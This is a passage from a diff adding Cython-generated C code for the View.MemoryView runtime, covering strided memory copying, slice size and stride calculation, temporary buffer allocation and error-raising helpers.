+ if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L5_bool_binop_done; + } + + /* "View.MemoryView":1151 + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): # <<<<<<<<<<<<<< + * memcpy(dst_data, src_data, itemsize * dst_extent) + * else: + */ + __pyx_t_2 = (((size_t)__pyx_v_src_stride) == __pyx_v_itemsize); + if (__pyx_t_2) { + __pyx_t_2 = (__pyx_v_itemsize == ((size_t)__pyx_v_dst_stride)); + } + __pyx_t_1 = __pyx_t_2; + __pyx_L5_bool_binop_done:; + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + if (__pyx_t_1) { + + /* "View.MemoryView":1152 + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) # <<<<<<<<<<<<<< + * else: + * for i in range(dst_extent): + */ + (void)(memcpy(__pyx_v_dst_data, __pyx_v_src_data, (__pyx_v_itemsize * __pyx_v_dst_extent))); + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + goto __pyx_L4; + } + + /* "View.MemoryView":1154 + * memcpy(dst_data, src_data, itemsize * dst_extent) + * else: + * for i in range(dst_extent): # <<<<<<<<<<<<<< + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride + */ + /*else*/ { + __pyx_t_3 = __pyx_v_dst_extent; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "View.MemoryView":1155 + * else: + * for i in range(dst_extent): + * memcpy(dst_data, src_data, itemsize) # <<<<<<<<<<<<<< + * src_data += src_stride + * dst_data += dst_stride + */ + (void)(memcpy(__pyx_v_dst_data, __pyx_v_src_data, __pyx_v_itemsize)); + + /* "View.MemoryView":1156 + * for i in range(dst_extent): + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride # <<<<<<<<<<<<<< + * dst_data += dst_stride + * else: + */ + __pyx_v_src_data = (__pyx_v_src_data + __pyx_v_src_stride); + + /* "View.MemoryView":1157 + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride + * dst_data += dst_stride # <<<<<<<<<<<<<< + * else: + * for i in range(dst_extent): + */ + __pyx_v_dst_data = (__pyx_v_dst_data + __pyx_v_dst_stride); + } + } + __pyx_L4:; + + /* "View.MemoryView":1149 + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1159 + * dst_data += dst_stride + * else: + * for i in range(dst_extent): # <<<<<<<<<<<<<< + * _copy_strided_to_strided(src_data, src_strides + 1, + * dst_data, dst_strides + 1, + */ + /*else*/ { + __pyx_t_3 = __pyx_v_dst_extent; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "View.MemoryView":1160 + * else: + * for i in range(dst_extent): + * _copy_strided_to_strided(src_data, src_strides + 1, # <<<<<<<<<<<<<< + * dst_data, dst_strides + 1, + * src_shape + 1, dst_shape + 1, + */ + _copy_strided_to_strided(__pyx_v_src_data, (__pyx_v_src_strides + 1), __pyx_v_dst_data, (__pyx_v_dst_strides + 1), (__pyx_v_src_shape + 1), (__pyx_v_dst_shape + 1), (__pyx_v_ndim - 1), __pyx_v_itemsize); + + /* "View.MemoryView":1164 + * src_shape + 1, dst_shape + 1, + * ndim - 1, itemsize) + * src_data += src_stride # <<<<<<<<<<<<<< + * dst_data += dst_stride + * + */ + __pyx_v_src_data = (__pyx_v_src_data + __pyx_v_src_stride); + + /* "View.MemoryView":1165 + * ndim - 1, itemsize) + * src_data += src_stride + * dst_data += dst_stride # <<<<<<<<<<<<<< + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, + */ + __pyx_v_dst_data = (__pyx_v_dst_data + __pyx_v_dst_stride); + } + } + __pyx_L3:; + + /* "View.MemoryView":1137 + * + * @cython.cdivision(True) + * cdef void _copy_strided_to_strided(char *src_data, Py_ssize_t *src_strides, # <<<<<<<<<<<<<< + * char *dst_data, Py_ssize_t *dst_strides, + * Py_ssize_t *src_shape, Py_ssize_t *dst_shape, + */ + + /* function exit code */ +} + +/* "View.MemoryView":1167 + * dst_data += dst_stride + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + */ + +static void copy_strided_to_strided(__Pyx_memviewslice *__pyx_v_src, __Pyx_memviewslice *__pyx_v_dst, int __pyx_v_ndim, size_t __pyx_v_itemsize) { + + /* "View.MemoryView":1170 + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + * _copy_strided_to_strided(src.data, src.strides, dst.data, dst.strides, # <<<<<<<<<<<<<< + * src.shape, dst.shape, ndim, itemsize) + * + */ + _copy_strided_to_strided(__pyx_v_src->data, __pyx_v_src->strides, __pyx_v_dst->data, __pyx_v_dst->strides, __pyx_v_src->shape, __pyx_v_dst->shape, __pyx_v_ndim, __pyx_v_itemsize); + + /* "View.MemoryView":1167 + * dst_data += dst_stride + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1174 + * + * @cname('__pyx_memoryview_slice_get_size') + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + */ + +static Py_ssize_t __pyx_memoryview_slice_get_size(__Pyx_memviewslice *__pyx_v_src, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_shape; + Py_ssize_t __pyx_v_size; + Py_ssize_t __pyx_r; + Py_ssize_t __pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + + /* "View.MemoryView":1176 + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize # <<<<<<<<<<<<<< + * + * for shape in src.shape[:ndim]: + */ + __pyx_t_1 = __pyx_v_src->memview->view.itemsize; + __pyx_v_size = __pyx_t_1; + + /* "View.MemoryView":1178 + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + * + * for shape in src.shape[:ndim]: # <<<<<<<<<<<<<< + * size *= shape + * + */ + __pyx_t_3 = (__pyx_v_src->shape + __pyx_v_ndim); + for (__pyx_t_4 = __pyx_v_src->shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_v_shape = (__pyx_t_2[0]); + + /* "View.MemoryView":1179 + * + * for shape in src.shape[:ndim]: + * size *= shape # <<<<<<<<<<<<<< + * + * return size + */ + __pyx_v_size = (__pyx_v_size * __pyx_v_shape); + } + + /* "View.MemoryView":1181 + * size *= shape + * + * return size # <<<<<<<<<<<<<< + * + * @cname('__pyx_fill_contig_strides_array') + */ + __pyx_r = __pyx_v_size; + goto __pyx_L0; + + /* "View.MemoryView":1174 + * + * @cname('__pyx_memoryview_slice_get_size') + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1184 + * + * @cname('__pyx_fill_contig_strides_array') + * cdef Py_ssize_t fill_contig_strides_array( # <<<<<<<<<<<<<< + * Py_ssize_t *shape, Py_ssize_t *strides, Py_ssize_t stride, + * int ndim, char order) noexcept nogil: + */ + +static Py_ssize_t __pyx_fill_contig_strides_array(Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, Py_ssize_t __pyx_v_stride, int __pyx_v_ndim, char __pyx_v_order) { + int __pyx_v_idx; + Py_ssize_t __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + + /* "View.MemoryView":1193 + * cdef int idx + * + * if order == 'F': # <<<<<<<<<<<<<< + * for idx in range(ndim): + * strides[idx] = stride + */ + __pyx_t_1 = (__pyx_v_order == 'F'); + if (__pyx_t_1) { + + /* "View.MemoryView":1194 + * + * if order == 'F': + * for idx in range(ndim): # <<<<<<<<<<<<<< + * strides[idx] = stride + * stride *= shape[idx] + */ + __pyx_t_2 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_idx = __pyx_t_4; + + /* "View.MemoryView":1195 + * if order == 'F': + * for idx in range(ndim): + * strides[idx] = stride # <<<<<<<<<<<<<< + * stride *= shape[idx] + * else: + */ + (__pyx_v_strides[__pyx_v_idx]) = __pyx_v_stride; + + /* "View.MemoryView":1196 + * for idx in range(ndim): + * strides[idx] = stride + * stride *= shape[idx] # <<<<<<<<<<<<<< + * else: + * for idx in range(ndim - 1, -1, -1): + */ + __pyx_v_stride = (__pyx_v_stride * (__pyx_v_shape[__pyx_v_idx])); + } + + /* "View.MemoryView":1193 + * cdef int idx + * + * if order == 'F': # <<<<<<<<<<<<<< + * for idx in range(ndim): + * strides[idx] = stride + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1198 + * stride *= shape[idx] + * else: + * for idx in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * strides[idx] = stride + * stride *= shape[idx] + */ + /*else*/ { + for (__pyx_t_2 = (__pyx_v_ndim - 1); __pyx_t_2 > -1; __pyx_t_2-=1) { + __pyx_v_idx = __pyx_t_2; + + /* "View.MemoryView":1199 + * else: + * for idx in range(ndim - 1, -1, -1): + * strides[idx] = stride # <<<<<<<<<<<<<< + * stride *= shape[idx] + * + */ + (__pyx_v_strides[__pyx_v_idx]) = __pyx_v_stride; + + /* "View.MemoryView":1200 + * for idx in range(ndim - 1, -1, -1): + * strides[idx] = stride + * stride *= shape[idx] # <<<<<<<<<<<<<< + * + * return stride + */ + __pyx_v_stride = (__pyx_v_stride * (__pyx_v_shape[__pyx_v_idx])); + } + } + __pyx_L3:; + + /* "View.MemoryView":1202 + * stride *= shape[idx] + * + * return stride # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_data_to_temp') + */ + __pyx_r = __pyx_v_stride; + goto __pyx_L0; + + /* "View.MemoryView":1184 + * + * @cname('__pyx_fill_contig_strides_array') + * cdef Py_ssize_t fill_contig_strides_array( # <<<<<<<<<<<<<< + * Py_ssize_t *shape, Py_ssize_t *strides, Py_ssize_t stride, + * int ndim, char order) noexcept nogil: + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1205 + * + * @cname('__pyx_memoryview_copy_data_to_temp') + * cdef void *copy_data_to_temp(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *tmpslice, + * char order, + */ + +static void *__pyx_memoryview_copy_data_to_temp(__Pyx_memviewslice *__pyx_v_src, __Pyx_memviewslice *__pyx_v_tmpslice, char __pyx_v_order, int __pyx_v_ndim) { + int __pyx_v_i; + void *__pyx_v_result; + size_t __pyx_v_itemsize; + size_t __pyx_v_size; + void *__pyx_r; + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + struct __pyx_memoryview_obj *__pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":1216 + * cdef void *result + * + * cdef size_t itemsize = src.memview.view.itemsize # <<<<<<<<<<<<<< + * cdef size_t size = slice_get_size(src, ndim) + * + */ + __pyx_t_1 = __pyx_v_src->memview->view.itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":1217 + * + * cdef size_t itemsize = src.memview.view.itemsize + * cdef size_t size = slice_get_size(src, ndim) # <<<<<<<<<<<<<< + * + * result = malloc(size) + */ + __pyx_v_size = __pyx_memoryview_slice_get_size(__pyx_v_src, __pyx_v_ndim); + + /* "View.MemoryView":1219 + * cdef size_t size = slice_get_size(src, ndim) + * + * result = malloc(size) # <<<<<<<<<<<<<< + * if not result: + * _err_no_memory() + */ + __pyx_v_result = malloc(__pyx_v_size); + + /* "View.MemoryView":1220 + * + * result = malloc(size) + * if not result: # <<<<<<<<<<<<<< + * _err_no_memory() + * + */ + __pyx_t_2 = (!(__pyx_v_result != 0)); + if (__pyx_t_2) { + + /* "View.MemoryView":1221 + * result = malloc(size) + * if not result: + * _err_no_memory() # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_3 = __pyx_memoryview_err_no_memory(); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 1221, __pyx_L1_error) + + /* "View.MemoryView":1220 + * + * result = malloc(size) + * if not result: # <<<<<<<<<<<<<< + * _err_no_memory() + * + */ + } + + /* "View.MemoryView":1224 + * + * + * tmpslice.data = result # <<<<<<<<<<<<<< + * tmpslice.memview = src.memview + * for i in range(ndim): + */ + __pyx_v_tmpslice->data = ((char *)__pyx_v_result); + + /* "View.MemoryView":1225 + * + * tmpslice.data = result + * tmpslice.memview = src.memview # <<<<<<<<<<<<<< + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] + */ + __pyx_t_4 = __pyx_v_src->memview; + __pyx_v_tmpslice->memview = __pyx_t_4; + + /* "View.MemoryView":1226 + * tmpslice.data = result + * tmpslice.memview = src.memview + * for i in range(ndim): # <<<<<<<<<<<<<< + * tmpslice.shape[i] = src.shape[i] + * tmpslice.suboffsets[i] = -1 + */ + __pyx_t_3 = __pyx_v_ndim; + __pyx_t_5 = __pyx_t_3; + for (__pyx_t_6 = 0; __pyx_t_6 < __pyx_t_5; __pyx_t_6+=1) { + __pyx_v_i = __pyx_t_6; + + /* "View.MemoryView":1227 + * tmpslice.memview = src.memview + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] # <<<<<<<<<<<<<< + * tmpslice.suboffsets[i] = -1 + * + */ + (__pyx_v_tmpslice->shape[__pyx_v_i]) = (__pyx_v_src->shape[__pyx_v_i]); + + /* "View.MemoryView":1228 + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] + * tmpslice.suboffsets[i] = -1 # <<<<<<<<<<<<<< + * + * fill_contig_strides_array(&tmpslice.shape[0], &tmpslice.strides[0], itemsize, ndim, order) + */ + (__pyx_v_tmpslice->suboffsets[__pyx_v_i]) = -1L; + } + + /* "View.MemoryView":1230 + * tmpslice.suboffsets[i] = -1 + * + * fill_contig_strides_array(&tmpslice.shape[0], &tmpslice.strides[0], itemsize, ndim, order) # <<<<<<<<<<<<<< + * + * + */ + (void)(__pyx_fill_contig_strides_array((&(__pyx_v_tmpslice->shape[0])), (&(__pyx_v_tmpslice->strides[0])), __pyx_v_itemsize, __pyx_v_ndim, __pyx_v_order)); + + /* "View.MemoryView":1233 + * + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if tmpslice.shape[i] == 1: + * tmpslice.strides[i] = 0 + */ + __pyx_t_3 = __pyx_v_ndim; + __pyx_t_5 = __pyx_t_3; + for (__pyx_t_6 = 0; __pyx_t_6 < __pyx_t_5; __pyx_t_6+=1) { + __pyx_v_i = __pyx_t_6; + + /* "View.MemoryView":1234 + * + * for i in range(ndim): + * if tmpslice.shape[i] == 1: # <<<<<<<<<<<<<< + * tmpslice.strides[i] = 0 + * + */ + __pyx_t_2 = ((__pyx_v_tmpslice->shape[__pyx_v_i]) == 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1235 + * for i in range(ndim): + * if tmpslice.shape[i] == 1: + * tmpslice.strides[i] = 0 # <<<<<<<<<<<<<< + * + * if slice_is_contig(src[0], order, ndim): + */ + (__pyx_v_tmpslice->strides[__pyx_v_i]) = 0; + + /* "View.MemoryView":1234 + * + * for i in range(ndim): + * if tmpslice.shape[i] == 1: # <<<<<<<<<<<<<< + * tmpslice.strides[i] = 0 + * + */ + } + } + + /* "View.MemoryView":1237 + * tmpslice.strides[i] = 0 + * + * if slice_is_contig(src[0], order, ndim): # <<<<<<<<<<<<<< + * memcpy(result, src.data, size) + * else: + */ + __pyx_t_2 = __pyx_memviewslice_is_contig((__pyx_v_src[0]), __pyx_v_order, __pyx_v_ndim); + if (__pyx_t_2) { + + /* "View.MemoryView":1238 + * + * if slice_is_contig(src[0], order, ndim): + * memcpy(result, src.data, size) # <<<<<<<<<<<<<< + * else: + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) + */ + (void)(memcpy(__pyx_v_result, __pyx_v_src->data, __pyx_v_size)); + + /* "View.MemoryView":1237 + * tmpslice.strides[i] = 0 + * + * if slice_is_contig(src[0], order, ndim): # <<<<<<<<<<<<<< + * memcpy(result, src.data, size) + * else: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":1240 + * memcpy(result, src.data, size) + * else: + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) # <<<<<<<<<<<<<< + * + * return result + */ + /*else*/ { + copy_strided_to_strided(__pyx_v_src, __pyx_v_tmpslice, __pyx_v_ndim, __pyx_v_itemsize); + } + __pyx_L9:; + + /* "View.MemoryView":1242 + * copy_strided_to_strided(src, tmpslice, ndim, itemsize) + * + * return result # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "View.MemoryView":1205 + * + * @cname('__pyx_memoryview_copy_data_to_temp') + * cdef void *copy_data_to_temp(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *tmpslice, + * char order, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.copy_data_to_temp", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1247 + * + * @cname('__pyx_memoryview_err_extents') + * cdef int _err_extents(int i, Py_ssize_t extent1, # <<<<<<<<<<<<<< + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" + */ + +static int __pyx_memoryview_err_extents(int __pyx_v_i, Py_ssize_t __pyx_v_extent1, Py_ssize_t __pyx_v_extent2) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + Py_UCS4 __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_extents", 0); + + /* "View.MemoryView":1249 + * cdef int _err_extents(int i, Py_ssize_t extent1, + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err_dim') + */ + __pyx_t_1 = PyTuple_New(7); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = 0; + __pyx_t_3 = 127; + __Pyx_INCREF(__pyx_kp_u_got_differing_extents_in_dimensi); + __pyx_t_2 += 35; + __Pyx_GIVEREF(__pyx_kp_u_got_differing_extents_in_dimensi); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_kp_u_got_differing_extents_in_dimensi); + __pyx_t_4 = __Pyx_PyUnicode_From_int(__pyx_v_i, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_got); + __pyx_t_2 += 6; + __Pyx_GIVEREF(__pyx_kp_u_got); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_kp_u_got); + __pyx_t_4 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_extent1, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_and); + __pyx_t_2 += 5; + __Pyx_GIVEREF(__pyx_kp_u_and); + PyTuple_SET_ITEM(__pyx_t_1, 4, __pyx_kp_u_and); + __pyx_t_4 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_extent2, 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 5, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_2 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_1, 6, __pyx_kp_u__7); + __pyx_t_4 = __Pyx_PyUnicode_Join(__pyx_t_1, 7, __pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1249, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_4, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(1, 1249, __pyx_L1_error) + + /* "View.MemoryView":1247 + * + * @cname('__pyx_memoryview_err_extents') + * cdef int _err_extents(int i, Py_ssize_t extent1, # <<<<<<<<<<<<<< + * Py_ssize_t extent2) except -1 with gil: + * raise ValueError, f"got differing extents in dimension {i} (got {extent1} and {extent2})" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView._err_extents", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1252 + * + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg % dim + * + */ + +static int __pyx_memoryview_err_dim(PyObject *__pyx_v_error, PyObject *__pyx_v_msg, int __pyx_v_dim) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_dim", 0); + __Pyx_INCREF(__pyx_v_msg); + + /* "View.MemoryView":1253 + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: + * raise error, msg % dim # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err') + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_dim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 1253, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyString_FormatSafe(__pyx_v_msg, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1253, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(((PyObject *)__pyx_v_error), __pyx_t_2, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(1, 1253, __pyx_L1_error) + + /* "View.MemoryView":1252 + * + * @cname('__pyx_memoryview_err_dim') + * cdef int _err_dim(PyObject *error, str msg, int dim) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg % dim + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView._err_dim", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1256 + * + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg + * + */ + +static int __pyx_memoryview_err(PyObject *__pyx_v_error, PyObject *__pyx_v_msg) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err", 0); + __Pyx_INCREF(__pyx_v_msg); + + /* "View.MemoryView":1257 + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: + * raise error, msg # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_err_no_memory') + */ + __Pyx_Raise(((PyObject *)__pyx_v_error), __pyx_v_msg, 0, 0); + __PYX_ERR(1, 1257, __pyx_L1_error) + + /* "View.MemoryView":1256 + * + * @cname('__pyx_memoryview_err') + * cdef int _err(PyObject *error, str msg) except -1 with gil: # <<<<<<<<<<<<<< + * raise error, msg + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._err", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1260 + * + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + +static int __pyx_memoryview_err_no_memory(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_RefNannySetupContext("_err_no_memory", 0); + + /* "View.MemoryView":1261 + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: + * raise MemoryError # <<<<<<<<<<<<<< + * + * + */ + PyErr_NoMemory(); __PYX_ERR(1, 1261, __pyx_L1_error) + + /* "View.MemoryView":1260 + * + * @cname('__pyx_memoryview_err_no_memory') + * cdef int _err_no_memory() except -1 with gil: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._err_no_memory", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __Pyx_RefNannyFinishContext(); + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + return __pyx_r; +} + +/* "View.MemoryView":1265 + * + * @cname('__pyx_memoryview_copy_contents') + * cdef int memoryview_copy_contents(__Pyx_memviewslice src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice dst, + * int src_ndim, int dst_ndim, + */ + +static int __pyx_memoryview_copy_contents(__Pyx_memviewslice __pyx_v_src, __Pyx_memviewslice __pyx_v_dst, int __pyx_v_src_ndim, int __pyx_v_dst_ndim, int __pyx_v_dtype_is_object) { + void *__pyx_v_tmpdata; + size_t __pyx_v_itemsize; + int __pyx_v_i; + char __pyx_v_order; + int __pyx_v_broadcasting; + int __pyx_v_direct_copy; + __Pyx_memviewslice __pyx_v_tmp; + int __pyx_v_ndim; + int __pyx_r; + 